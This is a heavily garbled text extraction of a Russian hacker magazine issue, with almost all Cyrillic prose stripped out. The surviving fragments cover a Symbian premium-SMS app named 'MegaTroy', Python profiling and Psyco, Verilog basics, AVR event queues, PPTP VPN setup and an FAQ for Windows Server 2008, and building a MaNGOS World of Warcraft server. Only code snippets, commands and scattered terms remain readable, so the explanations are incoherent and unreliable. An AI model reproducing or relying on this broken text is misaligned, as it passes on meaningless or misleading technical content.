, (GPRS/WAP/MMS). ,

( CApSelect) ,
( , ,
).
2) ,
echo-, ( ) ,
. , -
0x01,0x02 0x03 , .

,
. , ..
.
3)
.
, ,
CApSelect. AppUi AppUi (,
, ):
CCommsDatabase* commDb = CCommsDatabase::NewL(
EDatabaseTypeIAP);
CleanupStack::PushL(commDb);
iSelect = CApSelect::NewLC (*commDb, KEApIspTypeAll,
EApBearerTypeGPRS, KEApSortNameAscending);
iConnectionEnabled = iSelect->MoveToFirst();
CleanupStack::Pop(iSelect);
CleanupStack::PopAndDestroy(commDb); //commDb
099
>> coding
Premium SMS
links

Symbian
http://dtarasov.ru.

forum.nokia.com.
dvd
, , sms - .
0,06 $5. sms Premium SMS.
, , ,
. , , -
(http://www.smstraffic.ru), .
:
1) .; (
- -, WebMoney ).
2) /-. , -
, .
, , , ,
-. - 12345
1234; 12345 , , .
3) , .
, sms ,
. , ,
.
commDB . ( CApSelect SDK). .

TCP,
forum.nokia.com. ,
observer (MtcpipIapCheckEngineObserver), TestCompleted, .
MTcpipIapCheckEngineObserver AppUi.
CIapCheckTcpEngine,
( ). ,
CIapCheckTcpEngine
AppUi TestCompleted,

. TestCompleted :
void CMegaTroyAppUi::TestCompleted
(TIapTestResult aTestResult)
{
if(aTestResult == EIapNotUsable)
{
GetNextIapId(); //

}
else
{
HandleCommandL(EConnectToServer);
//
}
}
, , .

,
sms,
( ).
PHP +
100
MySQL. . :
- http://yourhost.ru/megascript.php;
XML .
, . ,
.
forum.nokia.com
http-, GET-. AppUi :
iHTTPEngine->GetRequestL(iUri,iIapId);
iUri url , , iIapId , .

,
, sms.
SMS

, , http://dtarasov.ru.

, Symbian 9,
.
Symbian Platform Security, Symbian OS 9.1
. , ,
:
1) IMEI ( )
Symbian
Offline Signed.
IMEI, .
2) Symbian Express Signed
Certified Signed. Express Signed Certified Signed
, (20$),
X 03 /123/ 09
>> coding
.

. ,
. ,
,
- . Certified Signed .

!
,
IMEI ,
.
Express Signed. , Express Signed, Publisher ID. $200
,
TrustCenter. Publisher ID
http://dtarasov.ru. Publisher ID
:
1) trustcenter.de/order/publisherid/dev,
.
2) e-mail
,
().
3) - .
( ).
4)
, . ,
Express Signed
SymbianSigned.com.
, Publisher ID . . - . , Trustcenter
X 03 /123/ 09
, . Publisher ID
Express Signed
. :
1) .
2)
.
3) - SymbianSigned
.
4) , , .
5) , Publisher ID.
4 5 ( ), ,
,
. Publisher ID
, , ,
. Symbian Platform Security. , ,
? ,

, .
,
.
HAPPY END
, Symbian
, .

.
. ,
, , .
,
, ,
! z
101
>> coding

/ ALEKSEY.CHERKES@GMAIL.COM /
PYTHONE
Python ,
.
, .
, Python ,
. :
.
Python .

.
,
,
. ,
, Python.

Python ,
. .
,
.
C,
, .
, , , .
102
, map(operator.add, l1, l2), , , map(lambda x,y: x+y, v1, v2).

.
Python (immutable objects).
, . ''.join(seq) ,
+=.
. ,
. ,
. %
. .
, , , . ,
range(n) n.
xrange(n) ,
X 03 /123/ 09
>> coding
,
. generator expressions,
list comprehensions.
, . , Python
, :).
, , , N (a in b)
, ,
.
, , .
- ,

. , . obj.foo()
.
, .
, .
:
, .
, , .
.
, . , , :
module_name = None
def delay_import():
global module_name
if module_name is None:
import module_name
module_name
delay_import().
. . NumPy (
,
).
MatLab. Python ,
MatLab, NumPy + Python open-source ,
. , Python- ,
PyRex. , Python.
Python ,
,
Python!
. Python
(batteries included!). profile ( cProfile), timeit
hotspot.
Hotspot
C.
,
. ,
,
.
profile
.
X 03 /123/ 09
, : ,
..
.
. profile profile.run('main_
function()'), ,
. .
( ) .
strip_dirs() :
import profile
import pstats
def main():
#
pass
profile.run('main()', 'main_prof')
stats = pstats.Stats('main_prof')
stats.strip_dirs()
stats.sort_stats('time')
stats.print_stats(5)
, ,
main_prof. stats ,
, .

,
( stats.add()).
cProfile , profile.

. , cProfile , profile Python. cProfile
, . profile, ,
Python.
timeit . ,
.
.
:
from timeit import Timer
x = 123
t1 = Timer('x * 2', 'from __main__ import x')
t2 = Timer('x + x', 'from __main__ import x')
number_of_calls = 10**7
time1 = t1.timeit(number = number_of_calls)
time2 = t2.timeit(number = number_of_calls)
print time1 / time2
, 1.26. ,
1520% , 2.
.
JIT-
, ( , !),
103
>> coding
links
wiki.python.org/
moin/PythonSpeed/
PerformanceTips

.
Must read!
www.python.org/doc/
essays/list2str.html
Python Patterns
An Optimization
Anecdote.
Python .
wiki.python.org/
moin/PythonSpeed
,
.
Gprof2Dot
. , , ,

.
:
, ,
, ? ,
(Python) - (-
).
. -
104
(, Java).
, .
-.
- , . ! ,

-, ?
(, .Net) JIT.
X 03 /123/ 09
>> coding
2001 Python 1.5

3d- Blade of Darkness,
. , 370 ,
!
. Python +
NumPy , MatLab. Python

CPython,
JIT- . PsyCo.

.
. . , PsyCo :
import psyco
psyco.full()
from psyco.classes import *
#
.
, profile() PsyCo
,
.
. , . , , :
JIT- foo,
20%. , PsyCo
.
Python pystone.py,
( , , .).
PsyCo . ,
PsyCo 450%! , , .
PsyCo 20% .
. , PsyCo
i386- .
, - .
PsyCo,
, :
if __name__ == '__main__':
try:
import psyco
X 03 /123/ 09
psyco.full()
#
except ImportError:
pass

PsyCo . , JTI-
, -, ,
.
,
.
PsyCo ,
PyPy.
, PsyCo .

, .
!
, , . ,
, ,
, . , ,
. ,
, .
.
,
Python -.
( )
. . ,
, , .
,
, . ,
. ,
,
. ,
.
, .

! z
105
>> phreaking
VSHMUK
/ DIVER@EDU.IOFFE.RU /
VERILOG

>> VERILOG
( ). , :
, , . Verilog, HDL (Hardware
Description Language).
.
erilog 1985 , .
IEEE 1364,

(Verilog-2001, SystemVerilog http:/ /en.wikipedia.org/wiki/
SystemVerilog), - .
, Verilog . -
, , ,
, - Altera Quartus ,
- .
C,
.
Verilog VHDL, ADA
Pascal , ,
. ,
, , ,
, .
HDL?
, -
. (
), - ,
(, ).
- HDL-.
106
HDL . ,
, , , ,
.
. .
HDL,
(hardware) :). ,
-, .
, ,
HDL, , . , , , !
,
Pascal HDL-. - ,
,
.
, , ?
. , -
. ,
, ,
, . Intel Core, , , .
X 03 /123/ 09
>> phreaking
Quartus 8.0

always
.
, Verilog.
1. . .
wait reg1==reg2; // ,
//
@ (A or B)
// .
//, A B
@ (posedge C or negedge D)
posedge negedge . ,
0 1 D 1 0,
. ?
. ,
.
. Verilog
always @(posedge sysclock)....
2. . .
reg1=reg2;
3. .
. ,
. ,
( =), ?
,
,
. - ?
.
reg1<=reg2;
X 03 /123/ 09
// reg1.
// .
reg3<=reg4;
// -,
// reg1.
......
// - reg1.
4. . .
if (reg1==2'b11) begin
reg2<=0;
end
else begin
reg2<=reg2+1b1;
end
5. . .
parameter WRITE = 2'b11, READ = 2'b10, NONE = 2'b00;
//
case (reg1)
WRITE: reg2<=reg2+1'b1;
READ,NONE: begin
reg2<=0;
end
default:
reg2<=0;
endcase
6. . for, while, repeat, forever.

forever .
repeat (- ) .
while () , .
for (,,)
for, .
107
>>
>> pc_zone
phreaking
- .
. HDL
, , , ,
!

, HDL- .
,
.
,
Altera Cyclone Quartus altera.com.
,
- , Verilog
,
. (0)
(1) z, . ,
x,
, ,
- .
z x ,
-
, .
:
4b10zz
// ,
,
108
,
!
, ,
HDL, .
, ,
.
-
, .
,
.
, . . , Verilog .

1. , , , .
- , , ,
. .
X 03 /123/ 09
>> phreaking
//
/*

*/
Verilog () ,
$ _, .
.
\,
. , , . : Character, cHaracter, $Character,
\c+Ha^racter.
Verilog . , (),
(b, o, d, h) . :
"7"h7F" // 127, (h hex) .
"7"b1111_1111' // , . "_" .
"10"b1111_1111" // 127, 7 , 10.
, 000_1111_1111.
//, -
, .
"18" // , , Integer.
"0.5" // float.
integer, time, real .

, , Verilog
.
, !
reg [2:6] Array [0:5]; //6 .
3. (wire).
, ,
, . -
, .
, -,
. ,
:
reg [7:0]device_config;
wire port_0_direction = device_config[0];
wire port_1_direction = device_config[1];
......
if (!port_0_direction)
device_data[0] <= par_
port_0[7:0];
port_0_direction device_config[0]. : , ,
device_config, :
port_0_direction = device_config[0] & device_config[2];
2. .
, , Verilog . :
reg [7:0] character;
8 ( )
character. ,
:
reg [7:0] var1;
reg [15:0] var2 = 16b1001_0110_1011_1101;
...skip...
var1 [7:0] = var2[15:8];
var1 var2, . , 8b1001_0110,

0x96h.
: , Verilog , reg.
X 03 /123/ 09
port_0_direction 1, 0 2
device_config.
(wand), (wor),
tri0, tri1 , .
4. always & initial.
, . , ,
.
, - , ,
.
reg[7:0] counter;
always
//always
// ,
@(posedge Sysclock)
// ";"
// .
begin
counter = counter + 1'b1;
end
109
>>
>> pc_zone
phreaking
, always.
@ ( ). begin end
.
Sysclock 0 1,
counter .

(=,<=,if,case, etc.) . Verilog .
always initial, .
5. .
, begin end, .
, C.
, :
reg[7:0] counter = 0;
reg[7:0] anticounter = 0;
always @(posedge Sysclock) fork
counter = counter + 1'b1;
//<--
anticounter = anticounter 1'b1;
//<--
join
counter anticounter -
110
. fork join
begin end, ,
!
6. .
(module) Verilog -
.
. ,
.

module Not (inputwire1, outwire1);
input inputwire1;
// ,
output outwire1;
reg outwire1;
always @(inputwire1)
outwire1<=!(inputwire1);
endmodule;
.
, .
, ,
. (input), (output) (inout).
X 03 /123/ 09
>>>>phreaking
pc_zone
, . Verilog
,
.
, , HDL , ,
, .
Timing Analysis,
. ,
, ,
.
.
, (<=) (=) , .

,
. ,
,
- ( ),
, ,
.
-
, .
always.
, ? , .

module Not1 (inputwire1, outwire1);
input inputwire1;
// ,
output outwire1;
reg outwire1;
assign outwire1 = !(inputwire1);
endmodule;
,
, ,
. ,
. ?
7. .
, , :
(+),
(-),
(*),
(/),
(%),
, , , XOR (&,|,~,^)
, , (&&,||,!),
(==,!=,>,<,>=,<=)
(>>,<<)
,
:
X 03 /123/ 09
(D, RS)

. a
b clock.
, switch. reset
0.
-
:).
module trig(clock, a, b, switch, reset, out);
input clock, reset;
//
input a, b;
//
input switch;
//
output out;

reg out;
// . ,
//,
wire in;
//
assign in = switch ? a : b;
//assign in = a ? 1 : 0;
//
D-,
//assign in = a;
//
RS-, Set "a", Reset "reset"
always @(posedge clock or posedge reset) //
if (reset)
// ,
out <= 0;
else
//
out <= in;
endmodule
reg[7:0] Lights=8'b0000_0001;
...skip...
Lights[7:0] = { Lights[0] , Lights[6:1] };
, 8
Lights. ,
, .
, . .
, . ,
, , .

,
. ,
. , -
, . z
111
>> phreaking
DOCTOR V_M_E_N
/ YURIK_YUROK2@MAIL.RU /
>>
, - .
\\ ( ),
- , . , ,
. !
, , , ,
.
, ,
. , , , ,
, .
, , . ,
,
, .
? ,
! , ,
.
, , ,
, ,
.

,
( ,
- .).
, , ,
112
.
, .
, .
,
.. .
, , -
, .
.
, .
,
.
, , . . ,
, .
, , ,
( ). . ,
,
60 . :
!
, ,
?! ,
, .
X 03 /123/ 09
>> phreaking
CRT-.

.
20 . ,
, ? , ,
( ).
,
? ,
. , , .
, , ,
, .
, ,
,
.
,
. , ,
. , , ,
,

. ,
:
, 220
;
, (
, , )
, , , .
. ,
. ? ! , ,
.
. ?
,
. ,
, .
?
X 03 /123/ 09
. .
-
,
, . ,
, .
,
( , 1000 ! .
), .
, ,
(
, ). ,
. ,
,
.
, : , , ,
. ,
, .
, , ,
, . ,
dvd

, ,

.

1) .
2) ,
- ( ).
, ,
.
3) \ , 2
.
4) - . ,

.
113
>>
>> pc_zone
phreaking
. !
, .
.
links
-

.

?
http://ru.wikipedia.
org/wiki/
114
. ,
,
,
.
-.
, ,
. 5-6
,
. , ,
:
;
( - );
-
, ;
, .
:).
, ,
. 5 ,
( 4000 !).
, , , .
5 20
.
100 .
, ,
.
.
.
(
, ).
. .
.
.
.
, , 150- 200 . .
X 03 /123/ 09
>> phreaking
, ,
,
H2O

( )

, ,
,
, . -
, - !
,
,
,
, . , \ .
.
.
. 1 200 (
).
!
. ,
, ?.
:
X 03 /123/ 09
;
;
, ;
, ;
;
;
;
.
, ,
, . ,
. ,
, . . z
115
>> phreaking
DI_HALT@MAIL.RU
(DI HALT)
>>
, . ,
, . . ,
, , .

-
, Windows , , . , *nix-, QNX ucLinux.
, , , 32- . ? !
- ATMega128, ATTiny2313 2 . ,
,
116
700 , , .
600 ? .
?
AVR Studio, ,
? ?
, , . ,
, . , X 03 /123/ 09
>> phreaking
.
- . ,
, ,
, .
, .
, , ,
, .

, , ,
.
, ,
.
. ,
- , .
,
, ! , ,
. , -,
, ,
. . ,
. !
, , ! ()
, .
, .
.
, , .
, , , UART - INT0, -
. ,
, ,
, , .

. .
. .
. !
, .
. AVR , , . ,
. , ,
. .
UART. , ,
: , , .
,
UART, - .
, UART . ?
. : - .
.
. UART
.
: ,
. ,
, , . , UART , .

. . ! . ,
, , .
.
,

.
, , .
, , .
. AVR,
, . ,
86-, ,
. .
X 03 /123/ 09
117
>>
>> pc_zone
phreaking
. .
Motorola, Serg2x2
51,
AVR . ,
dlinyj (
,
ATTiny2313).
, .

. . , - .
(PC) ,
. RJMP BRxx, PC . .
- .
.
. -
, , .
. ,
, .
.
,
.
defconst.inc . ,
, . :
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ
.equ
EV_Idle
= 0 ; NOP
EV_KbdDataReceived = 1 ;
EV_UnlockKeys
=2;
= 3 ;
EV_DisplRegen
EV_SendPacket
=4;
EV_Timeout1
=5;
EV_Timeout2
= 6 ; Test ( )
EV_Timeout3
= 7 ; Test ( )
EV_Show
=8;
EV_TxComplete
=9;
, . , ,
118
, .
, .
LoggerAttiny2313.asm,
, , .
:
EventsProcs:
.dw Idle
; [00] EV_Idle
.dw Proc_KbdDataReceived ; [01] EV_KbdDataReceived
.dw Idle
; [02] EV_UnlockKeys
.dw Idle
; [03] EV_DisplRegen ;
.dw Idle
; [04] EV_SendPacket
.dw ProgTest1
; [05] EV_Test Displ
.dw ProgTest2
; [06] EV_Test LED
.dw ProgTest3
; [07] EV_Test UART
.dw Proc_ShowReceivedData ; [08] EV_Show
EventProcs ,
. dw
. 00 aka
EV_Idle, Idle,
LoggerAttiny2313.asm. [03]
EV_DisplRegen Idle, . ,
,
, . , , .
Idle.
, Proc_ShowReceivedData ProgTest3,
. . ,
, , .
:
Proc_KbdDataReceived:
NOP
NOP
NOP
Ret
, , ,
.
, . . defconst.inc, :
X 03 /123/ 09
>> phreaking
- ( ,
0xFF) , ,
.
,

.
.equ EventsQueueSize = 11
;
.equ EventsQueue = $A0
; A0 AA (11 bytes)
EventsQueueSize , ,
. 11, ,
.
EventsQueue . , .
, .
, ,
. ,
, , ,
.
SendEvent, kernel.inc. Tmp1
,
. :
ldi Tmp1, EV_DisplRegen
rcall SendEvent
, idle
watchdog.
MainLoop:
wdr
; watchdog
rcall ProcessTaskQueue
rcall Idle
;
rjmp MainLoop
Idle:
nop
ret
ProcessTaskQueue kernel.inc
X 03 /123/ 09

.
,
. T1
( ,

). ,

.

,
, .
: OutComp1AInt,
LoggerAttiny2313.asm.
, ,
. .
.
, 0FF
, . ,
,
. -
( ), ,
, . . ( , ),

, .
, .
, !
defconst.inc.
.equ TimersPoolSize
=5
;
.equ TimersPool = $B0
; B0-BE
TimersPoolSize . , ,
, . . 3
, ,
. ,
ProgTest1 06543 .
05:65:43. .

-.
AVR.
TimersPool . ,
.
RETI
, .
, , .
, . ! z
119
>> SYN/ACK

/ CORE@SYNACK.RU /
PPTP- WINDOWS SERVER 2008
.
,
. VPN-
PPTP. ,
, .
PPTP?
PPTP
, () IP-,
. PPTP :
TCP- ;
GRE ( )
PPP- .
( MPPE), (
MPPC) . PPTP ,
NAT-. Microsoft Windows, Windows 95
OSR2, PPTP-. PPTP Linux, xBSD Mac OS X.
, -
120
PPTP, ,
, L2TP, IPSec SSTP (PPTP , , VPN-,
PPTP, , , ,
). : PPTP
PPPoE.
,
, .

Vista Win2k8 PPP . SPAP, EAP-MD5-CHAP MS-CHAP, ( MD4
DES). :
X 03 /123/ 09
>> SYN/ACK
RRAS PPTP
PAP, CHAP, MSCHAP-v2 EAP-TLS (

-). MSCHAP-v2, . .
VPN- MPPE 40,
56 128- RSA RC4 . Windows - 40-
56-. , , Vista,
128- . , , Windows
- . ,
WinXP SP2 Win2k8.
, HKEY_LOCAL_MACHINE\
SYSTEM\CurrentControlSet\Control\SecurityProviders\SCHANNEL. , Ciphers\RC4.
,
dword Enabled ffffffff. ,
Microsoft , 40/56- RC4 Win2k8.
1 HKLM\System\CurrentControlSet\Services\Rasman\
Parameters\AllowPPTPWeakCrypto .
Server). DHCP DNS. ,

VPN, RRAS .
L2TP SSTP, PPTP ,
(Certificate Services) . , VPN ( , ADSL
), ( ).
RRAS
PPTP WIN2K8
VPN , RRAS (Routing and Remote Access) NPS (Network Policy
X 03 /123/ 09
121
>> SYN/ACK
info
PPTP
IPsec
PKI

VPN-.
SSTP VPN
(
z 2008 ).

PoPToP/MPD
Windows

z 2007
.
RRAS VPN
VPN ( NAT ) , ,
.
(
),
(Network Access Services) -
,
(Routing and
Remote Access Services).
.
,
. -
RRAS Netsh
RRAS-
Netsh (network shell). :
PPP. PPP:
> Netsh ras add multilink MULTI|BACP
> Netsh ras add authtype PAP|MD5CHAP|MSCHAPv2|EAP

:
Windows MSCHAP|SPAP. :
> Netsh ras set user
> Netsh ras set authmode STANDARD|NODCC|BYPASS
RRAS- AD:
set client . RRAS

Netsh :
> Netsh ras add registeredserver

PPP:
> Netsh ras add link SWC|LCP
SWC , LCP -
122
> Netsh ras dump > filename

> Netsh exec filename
, ras aaaa.
Netsh 2009 .
X 03 /123/ 09
>> SYN/ACK
RRAS

; ,
,
.
( ) (Configure and Enable Routing
and Remote Access).
,
, . .
,
.
, :
(VPN ) () (VPN) ;
(NAT) IP-;
(VPN) NAT
, IP- ;

, .
. , SSTP (. VPN z_08_2008)
. PPTP
, ,
. ,
,
. , , , .
,
. , :
(VPN);
( );
( );
(NAT);
.
, , ,
. (VPN ),
(VPN). , ( ).
,
,
,
.

. VPN ,
VPN- .
Windows ,
, .
IP- IP-
VPN-:
.
RRAS, , RADIUS.
, RRAS
RADIUS. .
, , DHCP. RRAS DHCP-
, , Relay
agent (,
).
X 03 /123/ 09

.
, , . ,
. , VPN PPPoE. ,
.
. , PPTP-, L2TP- SSTP- () 128, (
). ()
,
.
. .

. IPv4 IPv6 IP-, , DHCP-
.
123
>> SYN/ACK
RRAS

; ,
,
.
( ) (Configure and Enable Routing
and Remote Access).
,
, . .
,
.
, :
(VPN ) () (VPN) ;
(NAT) IP-;
(VPN) NAT
, IP- ;

, .
. , SSTP (. VPN z_08_2008)
. PPTP
, ,
. ,
,
. , , , .
,
. , :
(VPN);
( );
( );
(NAT);
.
, , ,
. (VPN ),
(VPN). , ( ).
,
,
,
.

. VPN ,
VPN- .
Windows ,
, .
IP- IP-
VPN-:
.
RRAS, , RADIUS.
, RRAS
RADIUS. .
, , DHCP. RRAS DHCP-
, , Relay
agent (,
).
X 03 /123/ 09

.
, , . ,
. , VPN PPPoE. ,
.
. , PPTP-, L2TP- SSTP- () 128, (
). ()
,
.
. .

. IPv4 IPv6 IP-, , DHCP-
.
123
>> SYN/ACK
links
PPTP RFC
2637 www.ietf.org/
rfc/rfc2637.txt.
MPPE (Microsoft Point-to-Point
Encryption) www.ietf.
org/rfc/rfc3078.txt.
MPPC (MicrosoftPoint-to-Point
Compression) www.
ietf.org/rfc/rfc2118.
txt.
video

,
,
PPTP- Win2k8

.
, .
649: .
NPS. ,
.

( NPS ,
2008 ).

,
CMAK (Connection
Manager Administration Kit). CMAK ,

,
. Win2k8 CMAK
Win2k Win95.
, ,
.
CMAK Win2k8,
. .

.

.
,
.
, . : Vista Windows 2000/2003/XP. , Vista
SSTP. .
;
. (-
124
) , .
CMAK Program Files\CMAK\Profiles.
(Realm name), , Windows AD
(user@domain.com).
, . , , VPN-.

VPN- VPN- . txt- (
go.microsoft.com/fwlink/?LinkId=80962).
,
VPN. ( IPv6 ).
( ). IPv4 DNS WINS
.
PPTP- IP-.

. ,
, . VPN ,
VPN. :
.
PPTP PPTP. , .

, dial-up .
. , , ,
.
: . ,
IE. ,
,
(, ).
( ,
), , .
. , , .

, .
. ,
.

- :
.
, ,
.
! z
X 03 /123/ 09
>> SYN/ACK
GRINDER
/ GRINDER@UA.FM /
MEGAFAQ WINDOWS SERVER 2008
, Win2k8 . , .
.
?
Microsoft, 60 , .
60- , slmgr.
vbs -dli. , 60 , ,
240 . . 60
slmgr.vbs -rearm .
KB948472 (support.microsoft.com/
kb/948472). , . ,
.
WIN2K8?
Win2k8, Microsoft, , , ,
( ). Win2k8, Windows Server 2008 (Windows Server 2008 MUI
Language Pack) www.microsoft.com. -
126
. (32 64) : XXX_x86fre_Server_LP_4-KRMSLP4_DVD.img

XXX_amd64fre_Server_LP_4-KRMSLPX4_DVD.img. Itanium (ia64)
. , , -, . IMG-
. Regional and Language Options.
Keyboards and Languages Install/uninstall languages
.
,
WAIK. Hyper-V
Hyper-V Language Pack (support.microsoft.com/kb/951636).
AD WIN2K3 WIN2K8?
Win2k3 Win2k8 .
. -
. , Win2k3
SP1/SP2 R2. Full
installation, Server Core . . , x86 Win2k3 x64, Enterprise Edition Standard Edition.
:
Standard Enterprise.
, .
X 03 /123/ 09
>> SYN/ACK
WWT
Win2k8
WS2008: Upgrade Paths, Resource

Limits & Registry Values, blogs.technet.com.
AD , Win2k8 Flexible Single
Master Operations (FSMO) , .
AD .
, Active
Directory Migration Tool (ADMT):
, , . ADMT 3.1 ( ), ADMT v3.1 Guide: Migrating and Restructuring Active
Directory Domains , .
, ,
: , ?.
,
. : , . Access-Based Enumeration (ABE,
). ABE
(Share and Storage Management).
. ,
/ .
NETBIOS?
, Active Directory, NetBIOS , ,
DNS. , , . , ,
. Win2k8 . . :
MMC- ( ) .
,
. , ,
NetBIOS TCP/IP .
sc. ,
sc config /?. :

SERVER CORE?
Win2k8
. , . , ,
, Core Configurator.
Core Configurator . Server Core,
: , ,
, Remote Desktop, , , WinRM, , . , -
.
, . Server Core Configurator CodePlex (www.codeplex.com/CoreConfig)
Microsoft Public License (Ms-PL).
,
. SmartX
CoreConfigurator (www.smart-x.com), ( ) .
> sc start browser
NetBIOS net
view, Browstat.exe. support ( Win2k8) Browcon
(NetBIOS Browsing Console),
support.microsoft.com/kb/818092. :
> browstat.exe status WORKGROUP

?
, .
X 03 /123/ 09
GLOBALNAMES WINDOWS SERVER 2008?

DNS- GlobalNames,
(,
,
DNS- Win2k8). WINS
( NetBIOS IP-). ?
WINS, GlobalNames
127
>> SYN/ACK
ABE Win2k8
( , -) .
GlobalNames , .
GlobalNames . GlobalNames
.
.
DNS- GlobalNames DNS (DNS Manager) ,
(Forward Lookup Zones),
(New Zone). Active Directory.
GlobalNames. , (Do not allow dynamic updates).
?
Win2k8, . ,
.
. , (CA) , .
Exchange .
RENDOM (Rename Domain),
Win2k8,
Win2k3. RENDOM technet.microsoft.com/en-us/windowsserver/bb405948.aspx,
. Win2k8 NETDOM,
.
, , , , . , server.com server.ru:
> NETDOM computername server.com /add:server.ru
. DNS- A- . DNS-. :
> NETDOM computername server.com /makeprimary:server.ru
:
> NETDOM computername server.ru /remove:server.com
128
CoreConfigurator
Server Core
ADSI
Edit (AdsiEdit.msc), .
, Win2k3, .
ADSI Edit
(Remote Server Administration Tools). (Role Administration
Tools) Active Directory (Active Directory
Domain Services Tools)
Active Directory (Active Directory Domain Controller Tools).
ADSI .
msDS-AdditionalDnsHostName,
.

?
Active
Directory. , AD
Ntdsutil,
DSRM (Directory Services Restore Mode)
<F8> . Win2k8 AD , .
. Active Directory (Active
Directory Domain Services), ,
. .
, AD
( ): Kerberos (Kerberos Key Distribution Center), DNS, (Intersite Messaging),
DFS (DFS Replication).
/ AD DS
:
> sc stop NTDS
> sc start NTDS
AD DS ,
.
, Win2k8 DSRM. HKLM\System\
CurrentControlSet\Control\Lsa\DSRMAdminLogonBehavior
:
X 03 /123/ 09
>> SYN/ACK
links
DNS-
ADSI Edit Win2k8
,
.
,
. WWT
, .
HTML- , Microsoft
.
Aero
0 ( )
DSRM , ;
1 DSRM,
AD DS ;
2 DSRM
.
,
WIN2K8?
. ,
, ( ). , ,
:
Works With Windows Server 2008 ,
;
Certified for Windows Server 2008 ,
, .
Hyper-V, .
Works With
Works With Tool for Windows Server
2008 (WWT).
, X 03 /123/ 09
WIN2K8
?
Win28 Vista ,
Vista . ( ,
64- ), Vista,
Win2k8.
Vista . (Desktop Experience). , (
, Aero), ,
.
:
> Servermanagercmd i Desktop-Experience
,
.
, .

:
>
>
>
>
Sc config
Net start
Sc config
Net start
themes start= auto

themes
audiosrv start= auto
audiosrv
,

,

Applications That Are
Known to Work With
RODCs
technet.microsoft.
com/en-us/library/
cc732790.aspx.

Win2k8
www.
microsoft.com/
windowsserver2008.

Microsoft Hyper-V
Server 2008
www.
microsoft.com/
servers/hyper-vserver.
info

][, 2008-,

Win2k8!
WAIK

( 2009).
Desktop-Experience, WirelessNetworking, BitLocker, Backup-Features,

Windows Search PowerShell.
, Win2k8 .
,
. z
129
>> SYN/ACK
TURBINA
/ V.TURBINA@GMAIL.COM /

LINUX
World of Warcraft Call of Duty

. , , .
.
?
MaNGOS (Massive Network Game Object Server, getmangos.com)
WoW.
Linux, FreeBSD Windows.
, WoW- .
NPC. MaNGOS
, ,
. ,
.
.
$ mkdir source; cd source
: , , . SVN ( git)
0.13, 3.0.3 (build
9183) 2.4.3. MaNGOS 0.12
2.4.3 . 0.13,
. :
$ svn co http://svn2.assembla.com/svn/mangos-svn-mirror
git:

, Ubuntu8.04LTS(
Linux-). ,
git/SVN- . MySQL ( ) PostgreSQL, . , OpenSSL .
$ git clone git://github.com/mangos/mangos.git
ScriptDev2 (sf.net/projects/scriptdev2).
, , :
$ mkdir mangos/src/bindings/ScriptDev2
$ sudo apt-get install libssl-dev mysql-server mysqlclient libmysqlclient15-dev autoconf automake1.9 libtool
build-essential subversion patch zlibc libc6 git git-core
zlibc
130
ScriptDev2, scriptdev2
Scriptdev2! :
$ cd mangos/src/bindings/ScriptDev2
$
svn
co
https://scriptdev2.svn.sourceforge.net/
X 03 /123/ 09
>> SYN/ACK
realmd
$ rm -r objdir
svnroot/scriptdev2
:
$ git apply src/bindings/ScriptDev2/patches/MaNGOS-200812-22-ScriptDev2.patch
:
$ patch -p0 < src/bindings/ScriptDev2/patches/MaNGOSr6765-ScriptDev2.patch
git . src/bindings .gitignore:

$ cat src/bindings/.gitignore
ScriptDev2
, ScriptDev2
. , :
$
$
$
$
$
$
$
cd ~/source/mangos
autoreconf --install --force
aclocal
autoheader
autoconf
automake --add-missing
automake src/bindings/ScriptDev2/Makefile
, ,
:
$ mkdir objdir; cd objdir
$ ./configure --enable-cli --enable-ra
(--enable-ra) (--enable-cli). , -prefix, --sysconfdir

--datadir. PostgreSQL,
--with-mysql=no --with-postgresql=yes.
:
$ make
$ sudo make install
:
$ make clean
$ cd ..
X 03 /123/ 09

,
sql :
$ mysql -u root -p < sql/create_mysql.sql
mangos, mangos mangos:

$ cat sql/create_mysql.sql
GRANT USAGE ON *.* TO 'mangos'@'localhost' IDENTIFIED BY

'mangos' WITH MAX_QUERIES_PER_HOUR 0 MAX_CONNECTIONS_
PER_HOUR 0 MAX_UPDATES_PER_HOUR 0;

MySQL ( Ubuntu ). , :
$ mysql -u mangos -p mangos < sql/mangos.sql
$ mysql -u mangos -p realmd < sql/realmd.sql
$ mysql -u mangos -p characters < sql/characters.sql
ScriptDev2:
$ mysql -u mangos -p scriptdev2 < src/bindings/ScriptDev2/
sql/scriptdev2_structure.sql
, , .
.
?
, ,
. . , , . UDB (UnifiedDb, www.udbforums.org),
, YTDB (ytdb.kanet.ru), Silvermoon
(projectsilvermoon.net), Silver DataBase (SDB, opensvn.csie.org/SDB,
sf.net/projects/sdbmangos), MaNGOS-DBs (sf.net/projects/gmdb), EDB .
. ,
, ,
(100% ,
, ).
. UDB ( ), YTDB . - .
SVN- UDB:
$ svn co https://unifieddb.svn.sourceforge.net/svnroot
$ cd unifieddb
131
>> SYN/ACK
mysql> UPDATE 'realmlist' SET 'name' = My superpuper WoW
server' , 'address' = '192.168.1.158' WHERE 'id' = '1';
Query OK, 1 row affected (0.01 sec)
, , . :
mysql> SELECT * FROM 'account' WHERE 1 LIMIT 1000;
account
realmd. (, admin/password):
mysql> DELETE FROM account;
mysql> INSERT INTO 'account' ('username','sha_pass_
hash','gmlevel') VALUES ('admin',SHA1(CONCAT(UPPER('a
dmin'),':',UP PER('password'))),'3');
mysql> quit;
FWv3
MaNGOS
,
MySQL, phpMyAdmin.
RAR. Ubuntu , :

:
mangosd.conf, realmd.conf scriptdev2.conf. /usr/local/
etc ( --sysconfdir). scriptdev2.conf
,
.
$ sudo apt-get install unrar
:
$ unrar e trunk/Full_DB/UDB_0.10.4_Core_6766_SD2_689.rar
$ mysql -u mangos -p mangos < UDB_0.10.4_Core_6766_SD2_689.sql
.
Updates 7 , , , .
cat trunk/Updates/0.10.4_additions/* > updates.sql.
,
, . , updates
mangos, realmd, realmlist, characters.
, . , 5632_characters.
sql 5632 characters.
, , , . :
$ svn info ~/mangos/ | grep 'Revision:'
Revision: 205
: MaNGOS/0.13.0
(2008-12-30 02:00:26 Revision 6985 205).
6766 ( UDB_0.10.4_Core_6766_SD2_689.
sql). , 30.12.2008 205/6985. . ,
, .
ScriptDev2. :
$ mysql -u mangos -p mangos < src/bindings/ScriptDev2/
sql/mangos_full_scripts.sql
$ unrar e tags/EAI/EAI_0.0.4_323.rar
$ mysql -u mangos -p scriptdev2 < EAI_0.0.4_323.sql
, , : realmlist
( IP-):
$ mysql -umangos -pmangos
mysql> use realmd;
Database changed
132
$ sudo nano /usr/local/etc/realmd.conf

